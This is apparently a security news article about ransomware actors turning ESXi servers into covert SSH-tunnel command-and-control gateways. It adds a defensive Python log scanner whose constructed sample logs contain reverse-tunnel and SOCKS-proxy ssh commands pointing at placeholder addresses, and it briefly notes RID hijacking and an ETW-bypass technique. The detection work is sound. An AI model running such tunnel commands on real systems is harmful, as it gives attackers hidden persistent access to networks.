Stealthy Ransomware Hijacks ESXi Servers as Hidden Command Centers

ESXi Systems Exploited as Stealthy Command-and-Control Gateways

Recent cybersecurity research has uncovered that threat actors are not only targeting ESXi systems with ransomware but are also repurposing them as covert tunnels for command-and-control (C2) operations. Sygnia researchers have identified that these typically unmonitored ESXi appliances are becoming prime targets for network persistence and unauthorized access.

Attackers gain initial access through either stolen admin credentials or known vulnerabilities, subsequently establishing SSH tunnels to maintain persistent network presence. The stability of ESXi systems, which rarely experience unexpected shutdowns, makes them ideal for maintaining long-term unauthorized access while evading detection.

Key Monitoring Points:
– Critical log files for detection:
* /var/log/shell.log
* /var/log/hostd.log
* /var/log/auth.log
* /var/log/vobd.log
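As an added example (not part of the article and not Sygnia's tooling), the script below shows the kind of check a defender can run over the shell and auth logs listed above: it flags ESXi shell commands that start an SSH tunnel (the -R, -L and -D options) and SSH logins to the host that do not originate from the management network. The log lines are constructed approximations of ESXi shell.log and auth.log entries, and the field layout, the management subnet and the function names are assumptions.

```python
"""Flag ESXi log lines that suggest SSH tunnelling or logins from outside the admin network.

Added example, not code from the article or from Sygnia. The sample lines are
constructed to look like ESXi shell.log / auth.log entries; the exact layout on a
real host may differ, so adjust the two regexes to the format you actually see.
"""
import ipaddress
import re

# Constructed sample of /var/log/shell.log (assumed layout, not a real capture)
SAMPLE_SHELL_LOG = """\
2025-02-01T09:12:03Z shell[2101]: [root]: esxcli system version get
2025-02-01T09:15:44Z shell[2101]: [root]: ssh -f -N -R 2222:localhost:22 user@203.0.113.10
2025-02-01T09:16:10Z shell[2101]: [root]: ssh -D 1080 -N user@198.51.100.7
2025-02-01T10:02:51Z shell[2102]: [root]: vim-cmd vmsvc/getallvms
"""

# Constructed sample of /var/log/auth.log (assumed layout, not a real capture)
SAMPLE_AUTH_LOG = """\
2025-02-01T09:11:58Z sshd[2098]: Accepted password for root from 10.0.0.15 port 51234 ssh2
2025-02-01T03:40:12Z sshd[1877]: Accepted password for root from 203.0.113.10 port 40210 ssh2
2025-02-01T09:20:00Z sshd[2110]: Failed password for root from 203.0.113.77 port 40211 ssh2
"""

SHELL_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
AUTH_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Assumption: the only subnet from which admins should open SSH sessions to ESXi.
MGMT_NETS = [ipaddress.ip_network("10.0.0.0/24")]

# ssh options that set up a tunnel: -R (reverse), -L (local forward), -D (SOCKS proxy).
TUNNEL_LETTERS = set("RLD")


def is_tunnel_command(cmd: str) -> bool:
    """True if the shell command is an ssh invocation carrying a tunnel option.

    Handles both spaced forms ("-R 2222:...") and clustered short options
    ("-fNR 2222:..." or "-R2222:...") by inspecting the option letters only.
    """
    toks = cmd.split()
    if not toks or toks[0] != "ssh":
        return False
    for tok in toks[1:]:
        m = re.match(r"-([A-Za-z]+)", tok)  # ignore "--long" and non-option args
        if m and TUNNEL_LETTERS & set(m.group(1)):
            return True
    return False


def find_tunnel_commands(shell_log: str) -> list[tuple[str, str, str]]:
    """Return (timestamp, user, command) for every shell.log line that opens a tunnel."""
    hits = []
    for line in shell_log.splitlines():
        m = SHELL_RE.match(line)
        if m and is_tunnel_command(m.group("cmd")):
            hits.append((m.group("ts"), m.group("user"), m.group("cmd")))
    return hits


def find_unexpected_logins(auth_log: str, allowed_nets=MGMT_NETS) -> list[tuple[str, str, str]]:
    """Return (timestamp, user, source ip) for accepted logins from outside allowed_nets."""
    hits = []
    for line in auth_log.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # failed attempts and unrelated lines are left to other rules
        ip = ipaddress.ip_address(m.group("ip"))
        if not any(ip in net for net in allowed_nets):
            hits.append((m.group("ts"), m.group("user"), m.group("ip")))
    return hits


if __name__ == "__main__":
    for ts, user, cmd in find_tunnel_commands(SAMPLE_SHELL_LOG):
        print(f"[tunnel] {ts} {user}: {cmd}")
    for ts, user, ip in find_unexpected_logins(SAMPLE_AUTH_LOG):
        print(f"[login]  {ts} {user} from {ip} (outside management network)")
```

Run against the real files with the regexes adjusted to the host's line format; the two checks complement each other, since a tunnel opened from an already-compromised management host would only show up in shell.log, while credential abuse from an unexpected address would only show up in auth.log.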

Related Security Developments:
1. The North Korean Andariel group has been observed using RID hijacking to elevate privileges of standard accounts by modifying Windows Registry entries.

2. A new hardware breakpoint-based technique has been discovered that can bypass Event Tracing for Windows (ETW) detections, utilizing NtContinue instead of SetThreadContext to avoid triggering security alerts.

These findings emphasize the growing sophistication of cyber attacks and the importance of comprehensive monitoring of virtualization infrastructure.